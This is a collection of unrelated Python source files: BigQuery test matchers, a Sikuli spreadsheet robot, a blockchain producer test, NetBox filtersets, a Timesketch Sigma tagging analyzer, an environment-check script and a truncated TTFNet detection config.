exception,
(GoogleCloudError, ValueError, concurrent.futures.TimeoutError))
class BigqueryMatcher(BaseMatcher):
"""Matcher that verifies the checksum of Bigquery data with given query.
Fetch Bigquery data with given query, compute a hash string and compare
with expected checksum.
"""
def __init__(self, project, query, checksum):
"""Initialize BigQueryMatcher object.
Args:
project: The name (string) of the project.
query: The query (string) to perform.
checksum: SHA-1 hash generated from a sorted list of lines
read from expected output.
"""
if bigquery is None:
raise ImportError('Bigquery dependencies are not installed.')
if not query or not isinstance(query, str):
raise ValueError('Invalid argument: query. Please use non-empty string')
if not checksum or not isinstance(checksum, str):
raise ValueError(
'Invalid argument: checksum. Please use non-empty string')
self.project = project
self.query = query
self.expected_checksum = checksum
self.checksum = None
def _matches(self, _):
if self.checksum is None:
response = self._query_with_retry()
_LOGGER.info(
'Read from given query (%s), total rows %d',
self.query,
len(response))
self.checksum = compute_hash(response)
_LOGGER.info('Generate checksum: %s', self.checksum)
return self.checksum == self.expected_checksum
@retry.with_exponential_backoff(
num_retries=MAX_RETRIES,
retry_filter=retry_on_http_timeout_and_value_error)
def _query_with_retry(self):
"""Run Bigquery query with retry if got error http response"""
_LOGGER.info('Attempting to perform query %s to BQ', self.query)
# Create client here since it throws an exception if pickled.
bigquery_client = bigquery.Client(self.project)
query_job = bigquery_client.query(self.query)
rows = query_job.result(timeout=60)
return [row.values() for row in rows]
def describe_to(self, description):
description \
.append_text("Expected checksum is ") \
.append_text(self.expected_checksum)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual checksum is ") \
.append_text(self.checksum)
class BigqueryFullResultMatcher(BigqueryMatcher):
"""Matcher that verifies Bigquery data with given query.
Fetch Bigquery data with given query, compare to the expected data.
"""
def __init__(self, project, query, data):
"""Initialize BigQueryMatcher object.
Args:
project: The name (string) of the project.
query: The query (string) to perform.
data: List of tuples with the expected data.
"""
super(BigqueryFullResultMatcher,
self).__init__(project, query, 'unused_checksum')
self.expected_data = data
self.actual_data = None
def _matches(self, _):
if self.actual_data is None:
self.actual_data = self._get_query_result()
_LOGGER.info('Result of query is: %r', self.actual_data)
try:
equal_to(self.expected_data)(self.actual_data)
return True
except BeamAssertException:
return False
def _get_query_result(self):
return self._query_with_retry()
def describe_to(self, description):
description \
.append_text("Expected data is ") \
.append_text(self.expected_data)
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual data is ") \
.append_text(self.actual_data)
class BigqueryFullResultStreamingMatcher(BigqueryFullResultMatcher):
"""
Matcher that verifies Bigquery data with given query.
Fetch Bigquery data with given query, compare to the expected data.
This matcher polls BigQuery until the no. of records in BigQuery is
equal to the no. of records in expected data.
A timeout can be specified.
"""
DEFAULT_TIMEOUT = 5 * 60
def __init__(self, project, query, data, timeout=DEFAULT_TIMEOUT):
super(BigqueryFullResultStreamingMatcher,
self).__init__(project, query, data)
self.timeout = timeout
def _get_query_result(self):
start_time = time.time()
while time.time() - start_time <= self.timeout:
response = self._query_with_retry()
if len(response) >= len(self.expected_data):
return response
_LOGGER.debug('Query result contains %d rows' % len(response))
time.sleep(1)
if sys.version_info >= (3, ):
raise TimeoutError('Timeout exceeded for matcher.') # noqa: F821
else:
raise RuntimeError('Timeout exceeded for matcher.')
class BigQueryTableMatcher(BaseMatcher):
"""Matcher that verifies the properties of a Table in BigQuery."""
def __init__(self, project, dataset, table, expected_properties):
if bigquery is None:
raise ImportError('Bigquery dependencies are not installed.')
self.project = project
self.dataset = dataset
self.table = table
self.expected_properties = expected_properties
@retry.with_exponential_backoff(
num_retries=MAX_RETRIES,
retry_filter=retry_on_http_timeout_and_value_error)
def _get_table_with_retry(self, bigquery_wrapper):
return bigquery_wrapper.get_table(self.project, self.dataset, self.table)
def _matches(self, _):
_LOGGER.info('Start verify Bigquery table properties.')
# Run query
bigquery_wrapper = bigquery_tools.BigQueryWrapper()
self.actual_table = self._get_table_with_retry(bigquery_wrapper)
_LOGGER.info('Table proto is %s', self.actual_table)
return all(
self._match_property(v, self._get_or_none(self.actual_table, k)) for k,
v in self.expected_properties.items())
@staticmethod
def _get_or_none(obj, attr):
try:
return obj.__getattribute__(attr)
except AttributeError:
try:
return obj.get(attr, None)
except TypeError:
return None
@staticmethod
def _match_property(expected, actual):
_LOGGER.info("Matching %s to %s", expected, actual)
if isinstance(expected, dict):
return all(
BigQueryTableMatcher._match_property(
v, BigQueryTableMatcher._get_or_none(actual, k)) for k,
v in expected.items())
else:
return expected == actual
def describe_to(self, description):
description \
.append_text("Expected table attributes are ") \
.append_text(sorted((k, v)
for k, v in self.expected_properties.items()))
def describe_mismatch(self, pipeline_result, mismatch_description):
mismatch_description \
.append_text("Actual table attributes are ") \
.append_text(sorted((k, self._get_or_none(self.actual_table, k))
for k in self.expected_properties))
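# -----------------------------------------------------------------------------
# Usage sketch (not part of the original module; the project, query and checksum
# values are placeholders): the classes above are hamcrest matchers, so they
# are typically combined with assert_that against a finished pipeline result.
def _example_checksum_assertion(pipeline_result):
  from hamcrest import assert_that
  matcher = BigqueryMatcher(
      project='my-project',
      query='SELECT fruit FROM beam_test.groceries',
      checksum='expected-sha1-checksum')
  assert_that(pipeline_result, matcher)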
the-stack_0_25164
# -*- coding: utf-8 -*-
"""planilha
Controla uma planilha do excel. Atualmente trabalhando
apenas com o Excel 2010.
Esta classe serve para entrada de dados, normalmente uma lista de
processos que serão trabalhados, e também para gravar o resultado
da da tarefa executada pelo robô.
Autor: Francisco A C Lima ([email protected])
"""
from sikuli import *
from tela import Tela
class Planilha(Tela):
"""Classe Planilha
Classe que controla a entrada de dados para os robôs a partir
de uma planilha, bem como o retorno da tarefa executada.
"""
aplicativo = 'Planilha'
def __init__(self):
"""Construtor da Classe
Verifica ao carregar o objeto se a planilha está aberta
"""
self.icone = "icone_plan.png"
self.imagemPadrao = "img_plan.png"
def capturarCelula(self, coluna=0):
"""captura Celula
Keyword Arguments:
coluna {number} -- número da coluna (default: {0})
Returns:
str -- texto capturado
"""
# Env.setClipboard('')
if coluna:
type(Key.HOME)
for i in range(0, coluna):
type(Key.RIGHT)
sleep(1)
type('c', KeyModifier.CTRL)
sleep(1)
texto = Env.getClipboard()
texto = texto.strip()
sleep(1)
return texto
def gravar(self):
"""grava
Grava a planilha a cada alteração
Returns:
bol -- True se a planilha foi gravada
"""
sleep(1)
type('s', KeyModifier.CTRL)
sleep(2)
return True
def retornarResultado(self, resultado):
"""retorna resultado
Retorna na planilha o resultado da análise ou tarefa executada.
Arguments:
resultado {str} -- texto de retorno
Returns:
bool -- True se o resultado for inserido
"""
self.irParaProximaCelula()
sleep(1)
# Debug.log('resultado: ' + resultado)
resultado = resultado.strip()
resultado = resultado.replace('?', '')
resultado = resultado.replace('`', '\'')
resultado = resultado.replace('/', Key.DIVIDE)
paste(resultado)
sleep(1)
return True
def irParaProximaCelula(self):
sleep(0.5)
type(Key.RIGHT)
def irParaProximaLinha(self):
type(Key.HOME)
type(Key.DOWN)
# --------------------------------------------#
#         Tests of the Planilha class         #
# --------------------------------------------#
class TestesTela():
def capturaRetornaResultado(self):
planilha = Planilha()
planilha.visualizar()
texto = planilha.capturarCelula()
# texto = texto.replace('\n', '_')
print('** ' + texto + ' **')
planilha.retornarResultado(texto)
planilha.irParaProximaCelula()
# ----------------------------------------------
if __name__ == "__main__":
teste = TestesTela()
teste.capturaRetornaResultado()
the-stack_0_25166
#!/usr/bin/env python3
from testUtils import Utils
import testUtils
from Cluster import Cluster
from WalletMgr import WalletMgr
from Node import Node
from TestHelper import TestHelper
import time
import decimal
import math
import re
###############################################################
# amnod_producer_watermark_test
# --dump-error-details <Upon error print etc/amax/node_*/config.ini and var/lib/node_*/stderr.log to stdout>
# --keep-logs <Don't delete var/lib/node_* folders upon test completion>
###############################################################
def isValidBlockProducer(prodsActive, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
return False
return prodsActive[blockProducer]
def validBlockProducer(prodsActive, prodsSeen, blockNum, node):
blockProducer=node.getBlockProducerByNum(blockNum)
if blockProducer not in prodsActive:
Utils.cmdError("unexpected block producer %s at blockNum=%s" % (blockProducer,blockNum))
Utils.errorExit("Failed because of invalid block producer")
if not prodsActive[blockProducer]:
Utils.cmdError("block producer %s for blockNum=%s not elected, belongs to node %s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
Utils.errorExit("Failed because of incorrect block producer")
prodsSeen[blockProducer]=True
return blockProducer
def setProds(sharedProdKey):
setProdsStr='{"schedule": ['
firstTime=True
for name in ["defproducera", "shrproducera", "defproducerb", "defproducerc"]:
if firstTime:
firstTime = False
else:
setProdsStr += ','
key = cluster.defProducerAccounts[name].activePublicKey
if name == "shrproducera":
key = sharedProdKey
setProdsStr += ' { "producer_name": "%s", "block_signing_key": "%s" }' % (name, key)
setProdsStr += ' ] }'
Utils.Print("setprods: %s" % (setProdsStr))
opts="--permission amax@active"
# pylint: disable=redefined-variable-type
trans=cluster.biosNode.pushMessage("amax", "setprods", setProdsStr, opts)
if trans is None or not trans[0]:
Utils.Print("ERROR: Failed to set producer with cmd %s" % (setProdsStr))
def verifyProductionRounds(trans, node, prodsActive, rounds):
blockNum=node.getNextCleanProductionCycle(trans)
Utils.Print("Validating blockNum=%s" % (blockNum))
temp=Utils.Debug
Utils.Debug=False
Utils.Print("FIND VALID BLOCK PRODUCER")
blockProducer=node.getBlockProducerByNum(blockNum)
lastBlockProducer=blockProducer
adjust=False
while not isValidBlockProducer(prodsActive, blockNum, node):
adjust=True
blockProducer=node.getBlockProducerByNum(blockNum)
if lastBlockProducer!=blockProducer:
Utils.Print("blockProducer=%s for blockNum=%s is for node=%s" % (blockProducer, blockNum, ProducerToNode.map[blockProducer]))
lastBlockProducer=blockProducer
blockNum+=1
Utils.Print("VALID BLOCK PRODUCER")
saw=0
sawHigh=0
startingFrom=blockNum
doPrint=0
invalidCount=0
while adjust:
invalidCount+=1
if lastBlockProducer==blockProducer:
saw+=1
else:
if saw>=12:
startingFrom=blockNum
if saw>12:
Utils.Print("ERROR!!!!!!!!!!!!!! saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
break
else:
if saw > sawHigh:
sawHigh = saw
Utils.Print("sawHigh=%s" % (sawHigh))
if doPrint < 5:
doPrint+=1
Utils.Print("saw=%s, blockProducer=%s, blockNum=%s" % (saw,blockProducer,blockNum))
lastBlockProducer=blockProducer
saw=1
blockProducer=node.getBlockProducerByNum(blockNum)
blockNum+=1
if adjust:
blockNum-=1
Utils.Print("ADJUSTED %s blocks" % (invalidCount-1))
prodsSeen=None
reportFirstMissedBlock=False
Utils.Print("Verify %s complete rounds of all producers producing" % (rounds))
prodsSize = len(prodsActive)
for i in range(0, rounds):
prodsSeen={}
lastBlockProducer=None
for j in range(0, prodsSize):
# each new set of 12 blocks should have a different blockProducer
if lastBlockProducer is not None and lastBlockProducer==node.getBlockProducerByNum(blockNum):
Utils.cmdError("expected blockNum %s to be produced by any of the valid producers except %s" % (blockNum, lastBlockProducer))
Utils.errorExit("Failed because of incorrect block producer order")
# make sure that the next set of 12 blocks all have the same blockProducer
lastBlockProducer=node.getBlockProducerByNum(blockNum)
for k in range(0, 12):
blockProducer = validBlockProducer(prodsActive, prodsSeen, blockNum, node1)
if lastBlockProducer!=blockProducer:
if not reportFirstMissedBlock:
printStr=""
newBlockNum=blockNum-18
for l in range(0,36):
printStr+="%s" % (newBlockNum)
printStr+=":"
newBlockProducer=node.getBlockProducerByNum(newBlockNum)
printStr+="%s" % (newBlockProducer)
printStr+=" "
newBlockNum+=1
Utils.Print("NOTE: expected blockNum %s (started from %s) to be produced by %s, but produded by %s: round=%s, prod slot=%s, prod num=%s - %s" % (blockNum, startingFrom, lastBlockProducer, blockProducer, i, j, k, printStr))
reportFirstMissedBlock=True
break
blockNum+=1
# make sure that we have seen all 21 producers
prodsSeenKeys=prodsSeen.keys()
if len(prodsSeenKeys) != prodsSize:
Utils.cmdError("only saw %s producers of expected %d. At blockNum %s only the following producers were seen: %s" % (len(prodsSeenKeys), prodsSize, blockNum, ",".join(prodsSeenKeys)))
Utils.errorExit("Failed because of missing block producers")
Utils.Debug=temp
Print=Utils.Print
errorExit=Utils.errorExit
args = TestHelper.parse_args({"--prod-count","--dump-error-details","--keep-logs","-v","--leave-running","--clean-run",
"--wallet-port"})
Utils.Debug=args.v
totalNodes=3
cluster=Cluster(walletd=True)
dumpErrorDetails=args.dump_error_details
keepLogs=args.keep_logs
dontKill=args.leave_running
prodCount=args.prod_count
killAll=args.clean_run
walletPort=args.wallet_port
walletMgr=WalletMgr(True, port=walletPort)
testSuccessful=False
killEosInstances=not dontKill
killWallet=not dontKill
WalletdName=Utils.EosWalletName
ClientName="amcli"
try:
assert(totalNodes == 3)
TestHelper.printSystemInfo("BEGIN")
cluster.setWalletMgr(walletMgr)
cluster.killall(allInstances=killAll)
cluster.cleanup()
Print("Stand up cluster")
if cluster.launch(prodCount=prodCount, onlyBios=False, pnodes=totalNodes, totalNodes=totalNodes, totalProducers=totalNodes, useBiosBootFile=False, onlySetProds=True, sharedProducers=1) is False:
Utils.cmdError("launcher")
Utils.errorExit("Failed to stand up ama cluster.")
Print("Validating system accounts after bootstrap")
cluster.validateAccounts(None)
node0=cluster.getNode(0)
node1=cluster.getNode(1)
node2=cluster.getNode(2)
node=node0
numprod = totalNodes + 1
trans=None
prodsActive={}
prodsActive["shrproducera"] = True
prodsActive["defproducera"] = True
prodsActive["defproducerb"] = True
prodsActive["defproducerc"] = True
Print("Wait for initial schedule: defproducera(node 0) shrproducera(node 2) defproducerb(node 1) defproducerc(node 2)")
tries=10
while tries > 0:
node.infoValid = False
info = node.getInfo()
if node.infoValid and node.lastRetrievedHeadBlockProducer != "amax":
break
time.sleep(1)
tries = tries-1
if tries == 0:
Utils.errorExit("failed to wait for initial schedule")
# try to change signing key of shrproducera, shrproducera will produced by node1 instead of node2
Print("change producer signing key, shrproducera will be produced by node1 instead of node2")
shracc_node1 = cluster.defProducerAccounts["shrproducera"]
shracc_node1.activePublicKey = cluster.defProducerAccounts["defproducerb"].activePublicKey
setProds(shracc_node1.activePublicKey)
Print("sleep for 4/3 rounds...")
time.sleep(numprod * 6 * 4 / 3)
verifyProductionRounds(trans, node0, prodsActive, 1)
# change signing key of shrproducera that no one can sign
accounts = cluster.createAccountKeys(1)
Print("change producer signing key of shrproducera that none of the node has")
shracc_node1.activePublicKey = accounts[0].activePublicKey
del prodsActive["shrproducera"]
setProds(shracc_node1.activePublicKey)
Print("sleep for 4/3 rounds...")
time.sleep(numprod * 6 * 4 / 3)
verifyProductionRounds(trans, node0, prodsActive, 1)
# change signing key back to node1
Print("change producer signing key of shrproducera so that node1 can produce again")
shracc_node1.activePublicKey = cluster.defProducerAccounts["defproducerb"].activePublicKey
prodsActive["shrproducera"] = True
setProds(shracc_node1.activePublicKey)
tries=numprod * 6 * 4 # give 4 rounds
while tries > 0:
node.infoValid = False
info = node.getInfo()
if node.infoValid and node.lastRetrievedHeadBlockProducer == "shrproducera":
break
time.sleep(1)
tries = tries-1
if tries == 0:
Utils.errorExit("shrproducera failed to produce")
testSuccessful=True
finally:
TestHelper.shutdown(cluster, walletMgr, testSuccessful=testSuccessful, killEosInstances=killEosInstances, killWallet=killWallet, keepLogs=keepLogs, cleanRun=killAll, dumpErrorDetails=dumpErrorDetails)
exit(0)
the-stack_0_25167
import django_filters
from copy import deepcopy
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django_filters.exceptions import FieldLookupError
from django_filters.utils import get_model_field, resolve_field
from extras.choices import CustomFieldFilterLogicChoices
from extras.filters import TagFilter
from extras.models import CustomField
from utilities.constants import (
FILTER_CHAR_BASED_LOOKUP_MAP, FILTER_NEGATION_LOOKUP_MAP, FILTER_TREENODE_NEGATION_LOOKUP_MAP,
FILTER_NUMERIC_BASED_LOOKUP_MAP
)
from utilities.forms import MACAddressField
from utilities import filters
__all__ = (
'BaseFilterSet',
'ChangeLoggedModelFilterSet',
'NetBoxModelFilterSet',
'OrganizationalModelFilterSet',
)
#
# FilterSets
#
class BaseFilterSet(django_filters.FilterSet):
"""
    A base FilterSet which provides some enhanced functionality over django-filter's FilterSet class.
"""
FILTER_DEFAULTS = deepcopy(django_filters.filterset.FILTER_FOR_DBFIELD_DEFAULTS)
FILTER_DEFAULTS.update({
models.AutoField: {
'filter_class': filters.MultiValueNumberFilter
},
models.CharField: {
'filter_class': filters.MultiValueCharFilter
},
models.DateField: {
'filter_class': filters.MultiValueDateFilter
},
models.DateTimeField: {
'filter_class': filters.MultiValueDateTimeFilter
},
models.DecimalField: {
'filter_class': filters.MultiValueNumberFilter
},
models.EmailField: {
'filter_class': filters.MultiValueCharFilter
},
models.FloatField: {
'filter_class': filters.MultiValueNumberFilter
},
models.IntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.PositiveIntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.PositiveSmallIntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.SlugField: {
'filter_class': filters.MultiValueCharFilter
},
models.SmallIntegerField: {
'filter_class': filters.MultiValueNumberFilter
},
models.TimeField: {
'filter_class': filters.MultiValueTimeFilter
},
models.URLField: {
'filter_class': filters.MultiValueCharFilter
},
MACAddressField: {
'filter_class': filters.MultiValueMACAddressFilter
},
})
@staticmethod
def _get_filter_lookup_dict(existing_filter):
# Choose the lookup expression map based on the filter type
if isinstance(existing_filter, (
django_filters.NumberFilter,
filters.MultiValueDateFilter,
filters.MultiValueDateTimeFilter,
filters.MultiValueNumberFilter,
filters.MultiValueTimeFilter
)):
return FILTER_NUMERIC_BASED_LOOKUP_MAP
elif isinstance(existing_filter, (
filters.TreeNodeMultipleChoiceFilter,
)):
# TreeNodeMultipleChoiceFilter only support negation but must maintain the `in` lookup expression
return FILTER_TREENODE_NEGATION_LOOKUP_MAP
elif isinstance(existing_filter, (
django_filters.ModelChoiceFilter,
django_filters.ModelMultipleChoiceFilter,
TagFilter
)) or existing_filter.extra.get('choices'):
# These filter types support only negation
return FILTER_NEGATION_LOOKUP_MAP
elif isinstance(existing_filter, (
django_filters.filters.CharFilter,
django_filters.MultipleChoiceFilter,
filters.MultiValueCharFilter,
filters.MultiValueMACAddressFilter
)):
return FILTER_CHAR_BASED_LOOKUP_MAP
return None
@classmethod
def get_additional_lookups(cls, existing_filter_name, existing_filter):
new_filters = {}
# Skip on abstract models
if not cls._meta.model:
return {}
# Skip nonstandard lookup expressions
if existing_filter.method is not None or existing_filter.lookup_expr not in ['exact', 'in']:
return {}
# Choose the lookup expression map based on the filter type
lookup_map = cls._get_filter_lookup_dict(existing_filter)
if lookup_map is None:
# Do not augment this filter type with more lookup expressions
return {}
# Get properties of the existing filter for later use
field_name = existing_filter.field_name
field = get_model_field(cls._meta.model, field_name)
# Create new filters for each lookup expression in the map
for lookup_name, lookup_expr in lookup_map.items():
new_filter_name = f'{existing_filter_name}__{lookup_name}'
try:
if existing_filter_name in cls.declared_filters:
# The filter field has been explicitly defined on the filterset class so we must manually
# create the new filter with the same type because there is no guarantee the defined type
# is the same as the default type for the field
resolve_field(field, lookup_expr) # Will raise FieldLookupError if the lookup is invalid
new_filter = type(existing_filter)(
field_name=field_name,
lookup_expr=lookup_expr,
label=existing_filter.label,
exclude=existing_filter.exclude,
distinct=existing_filter.distinct,
**existing_filter.extra
)
elif hasattr(existing_filter, 'custom_field'):
# Filter is for a custom field
custom_field = existing_filter.custom_field
new_filter = custom_field.to_filter(lookup_expr=lookup_expr)
else:
# The filter field is listed in Meta.fields so we can safely rely on default behaviour
# Will raise FieldLookupError if the lookup is invalid
new_filter = cls.filter_for_field(field, field_name, lookup_expr)
except FieldLookupError:
# The filter could not be created because the lookup expression is not supported on the field
continue
if lookup_name.startswith('n'):
# This is a negation filter which requires a queryset.exclude() clause
# Of course setting the negation of the existing filter's exclude attribute handles both cases
new_filter.exclude = not existing_filter.exclude
new_filters[new_filter_name] = new_filter
return new_filters
@classmethod
def get_filters(cls):
"""
Override filter generation to support dynamic lookup expressions for certain filter types.
For specific filter types, new filters are created based on defined lookup expressions in
the form `<field_name>__<lookup_expr>`
"""
filters = super().get_filters()
additional_filters = {}
for existing_filter_name, existing_filter in filters.items():
additional_filters.update(cls.get_additional_lookups(existing_filter_name, existing_filter))
filters.update(additional_filters)
return filters
class ChangeLoggedModelFilterSet(BaseFilterSet):
created = django_filters.DateTimeFilter()
created__gte = django_filters.DateTimeFilter(
field_name='created',
lookup_expr='gte'
)
created__lte = django_filters.DateTimeFilter(
field_name='created',
lookup_expr='lte'
)
last_updated = django_filters.DateTimeFilter()
last_updated__gte = django_filters.DateTimeFilter(
field_name='last_updated',
lookup_expr='gte'
)
last_updated__lte = django_filters.DateTimeFilter(
field_name='last_updated',
lookup_expr='lte'
)
class NetBoxModelFilterSet(ChangeLoggedModelFilterSet):
"""
Provides additional filtering functionality (e.g. tags, custom fields) for core NetBox models.
"""
q = django_filters.CharFilter(
method='search',
label='Search',
)
tag = TagFilter()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Dynamically add a Filter for each CustomField applicable to the parent model
custom_fields = CustomField.objects.filter(
content_types=ContentType.objects.get_for_model(self._meta.model)
).exclude(
filter_logic=CustomFieldFilterLogicChoices.FILTER_DISABLED
)
custom_field_filters = {}
for custom_field in custom_fields:
filter_name = f'cf_{custom_field.name}'
filter_instance = custom_field.to_filter()
if filter_instance:
custom_field_filters[filter_name] = filter_instance
# Add relevant additional lookups
additional_lookups = self.get_additional_lookups(filter_name, filter_instance)
custom_field_filters.update(additional_lookups)
self.filters.update(custom_field_filters)
def search(self, queryset, name, value):
"""
Override this method to apply a general-purpose search logic.
"""
return queryset
class OrganizationalModelFilterSet(NetBoxModelFilterSet):
"""
A base class for adding the search method to models which only expose the `name` and `slug` fields
"""
def search(self, queryset, name, value):
if not value.strip():
return queryset
return queryset.filter(
models.Q(name__icontains=value) |
models.Q(slug__icontains=value)
)
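# -----------------------------------------------------------------------------
# Usage sketch (not part of this module; `Site` from NetBox's dcim app is used
# only as an illustrative model): a concrete filterset just lists its fields,
# and BaseFilterSet.get_filters() augments each one with the lookup maps above,
# so e.g. `name`, `name__n`, `name__ic`, `name__isw` all become available.
def _example_site_filterset():
    from dcim.models import Site  # local import to avoid circular imports

    class SiteFilterSet(NetBoxModelFilterSet):
        class Meta:
            model = Site
            fields = ('id', 'name', 'slug')

    # Typical usage: SiteFilterSet({'name__ic': ['dc']}, queryset=Site.objects.all()).qs
    return SiteFilterSet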
the-stack_0_25169
"""Index analyzer plugin for sigma."""
from __future__ import unicode_literals
import logging
from timesketch.lib.analyzers import utils
from timesketch.lib.analyzers import interface
from timesketch.lib.analyzers import manager
import timesketch.lib.sigma_util as ts_sigma_lib
logger = logging.getLogger("timesketch.analyzers.sigma_tagger")
class SigmaPlugin(interface.BaseAnalyzer):
"""Analyzer for Sigma."""
NAME = "sigma"
DISPLAY_NAME = "Sigma"
DESCRIPTION = "Run pre-defined Sigma rules and tag matching events"
def __init__(self, index_name, sketch_id, timeline_id=None, **kwargs):
"""Initialize The Sigma Analyzer.
Args:
index_name: OpenSearch index name
sketch_id: Sketch ID
timeline_id: The ID of the timeline.
"""
self.index_name = index_name
self._rule = kwargs.get("rule")
super().__init__(index_name, sketch_id, timeline_id=timeline_id)
def run_sigma_rule(
self, query, rule_name, tag_list=None, status_good=True):
"""Runs a sigma rule and applies the appropriate tags.
Args:
query: OpenSearch search query for events to tag.
rule_name: rule_name to apply to matching events.
tag_list: a list of additional tags to be added to the event(s)
status_good (bool): rule status based on the sigma_rule_status csv
Returns:
int: number of events tagged.
"""
if not tag_list:
tag_list = []
return_fields = []
tagged_events_counter = 0
events = self.event_stream(
query_string=query, return_fields=return_fields
)
for event in events:
ts_sigma_rules = event.source.get("ts_sigma_rule", [])
ts_sigma_rules.append(rule_name)
event.add_attributes({"ts_sigma_rule": list(set(ts_sigma_rules))})
if status_good:
ts_ttp = event.source.get("ts_ttp", [])
special_tags = []
for tag in tag_list:
# Special handling for sigma tags that TS considers TTPs
# https://car.mitre.org and https://attack.mitre.org
if tag.startswith(("attack.", "car.")):
ts_ttp.append(tag)
special_tags.append(tag)
# add the remaining tags as plain tags
tags_to_add = list(set(tag_list) - set(special_tags))
event.add_tags(tags_to_add)
if len(ts_ttp) > 0:
event.add_attributes({"ts_ttp": list(set(ts_ttp))})
event.commit()
tagged_events_counter += 1
return tagged_events_counter
def run(self):
"""Entry point for the analyzer.
Returns:
String with summary of the analyzer result.
"""
tags_applied = {}
sigma_rule_counter = 0
tagged_events_counter = 0
rule = self._rule
if not rule:
logger.error("No Sigma rule given.")
return "Unable to run, no rule given to the analyzer"
rule_name = rule.get("title", "N/A")
problem_strings = []
output_strings = []
tags_applied[rule.get("file_name")] = 0
try:
sigma_rule_counter += 1
tagged_events_counter = self.run_sigma_rule(
rule.get("es_query"),
rule.get("file_name"),
tag_list=rule.get("tags"),
status_good=rule.get('ts_use_in_analyzer'),
)
tags_applied[rule.get("file_name")] += tagged_events_counter
except: # pylint: disable=bare-except
logger.error(
"Problem with rule in file {0:s}: ".format(
rule.get("file_name")
),
exc_info=True,
)
problem_strings.append("* {0:s}".format(rule.get("file_name")))
output_strings.append(
f"{tagged_events_counter} events tagged for rule [{rule_name}]"
)
if len(problem_strings) > 0:
output_strings.append("Problematic rules:")
output_strings.extend(problem_strings)
return "\n".join(output_strings)
def add_sigma_match_view(self, sigma_rule_counter):
"""Adds a view with the top 20 matching rules.
Args:
            sigma_rule_counter: number of matching rules
"""
view = self.sketch.add_view(
view_name="Sigma Rule matches",
analyzer_name=self.NAME,
query_string='tag:"sigma*"',
)
agg_params = {
"field": "tag",
"limit": 20,
"index": [self.timeline_id],
}
agg_obj = self.sketch.add_aggregation(
name="Top 20 Sigma tags",
agg_name="field_bucket",
agg_params=agg_params,
view_id=view.id,
chart_type="hbarchart",
description="Created by the Sigma analyzer",
)
story = self.sketch.add_story("Sigma Rule hits")
story.add_text(utils.SIGMA_STORY_HEADER, skip_if_exists=True)
        story.add_text(
            "## Sigma Analyzer.\n\nThe Sigma "
            "analyzer takes Events and matches them with Sigma rules. "
            "In this timeline the analyzer discovered {0:d} "
            "Sigma tags.\n\nThis is a summary of "
            "its findings.".format(sigma_rule_counter)
        )
story.add_text("The top 20 most commonly discovered tags were:")
story.add_aggregation(agg_obj)
story.add_text("And an overview of all the discovered search terms:")
story.add_view(view)
@staticmethod
def get_kwargs():
"""Returns an array of all rules of Timesketch.
Returns:
sigma_rules All Sigma rules
"""
sigma_rules = []
for rule in ts_sigma_lib.get_all_sigma_rules():
sigma_rules.append({"rule": rule})
return sigma_rules
class RulesSigmaPlugin(SigmaPlugin):
"""Sigma plugin to run rules."""
NAME = "sigma"
manager.AnalysisManager.register_analyzer(RulesSigmaPlugin)
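# Sketch of how the plugin is typically driven (invocation details assumed, not
# taken from this file): the analysis manager calls get_kwargs() once and spawns
# one analyzer per returned {"rule": ...} dict, roughly equivalent to:
#   for kwargs in RulesSigmaPlugin.get_kwargs():
#       analyzer = RulesSigmaPlugin(index_name="my-index", sketch_id=1, **kwargs)
#       print(analyzer.run())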
|
the-stack_0_25170
|
# Authors: Amit Kapoor and Bargava Subramanian
# Copyright (c) 2016 Amit Kapoor
# License: MIT License
"""
This script will check if the environment setup is correct for the workshop.
To run, please execute the following command from the command prompt
>>> python check_env.py
The output will indicate if any of the libraries are missing or need to be updated.
This script is inspired by https://github.com/fonnesbeck/scipy2015_tutorial/blob/master/check_env.py
"""
from __future__ import print_function
try:
import curses
curses.setupterm()
assert curses.tigetnum("colors") > 2
OK = "\x1b[1;%dm[ OK ]\x1b[0m" % (30 + curses.COLOR_GREEN)
FAIL = "\x1b[1;%dm[FAIL]\x1b[0m" % (30 + curses.COLOR_RED)
except:
OK = '[ OK ]'
FAIL = '[FAIL]'
import sys
try:
import importlib
except ImportError:
print(FAIL, "Python version 2.7 is required, but %s is installed." % sys.version)
from distutils.version import LooseVersion as Version
def import_version(pkg, min_ver, fail_msg=""):
    mod = None
    try:
        mod = importlib.import_module(pkg)
        if (pkg == "spacy" or pkg == "wordcloud") and mod is not None:
            # These packages are only checked for presence, not for a version.
            print(OK, '%s ' % (pkg))
        else:
            version = getattr(mod, "__version__", 0) or getattr(mod, "VERSION", 0)
            if Version(version) < min_ver:
                print(FAIL, "%s version %s or higher required, but %s installed."
                      % (pkg, min_ver, version))
            else:
                print(OK, '%s version %s' % (pkg, version))
    except ImportError:
        print(FAIL, '%s not installed. %s' % (pkg, fail_msg))
    return mod
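# Example call (illustrative): verify a single package against a minimum version,
# printing an OK/FAIL line and returning the imported module (or None if missing).
#   import_version("numpy", "1.10.4", fail_msg="run `pip install numpy`")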
# first check the python version
print('Using python in', sys.prefix)
print(sys.version)
pyversion = Version(sys.version)
if pyversion < "2":
    print(FAIL, "Unknown Python version: %s" % sys.version)
elif pyversion < "3":
    print(FAIL, "Python version 3 is required, but %s is installed. Please upgrade to version 3." % sys.version)
print()
requirements = {
'IPython' : '4.0.3',
'jupyter' :'1.0.0',
'matplotlib' :'1.5.0',
'numpy' : '1.10.4',
'pandas' : '0.17.1',
'scipy' : '0.17.0',
'sklearn' : '0.17',
'seaborn' :'0.6.0',
'statsmodels':'0.6.1'
}
# now the dependencies
for lib, required_version in list(requirements.items()):
import_version(lib, required_version)
|
the-stack_0_25173
|
# model settings
model = dict(
type='TTFNet',
pretrained='modelzoo://resnet18',
backbone=dict(
type='ResNet',
depth=18,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_eval=False,
style='pytorch'),
neck=None,
bbox_head=dict(
type='TTFLevelHead',
inplanes=(64, 128, 256, 512),
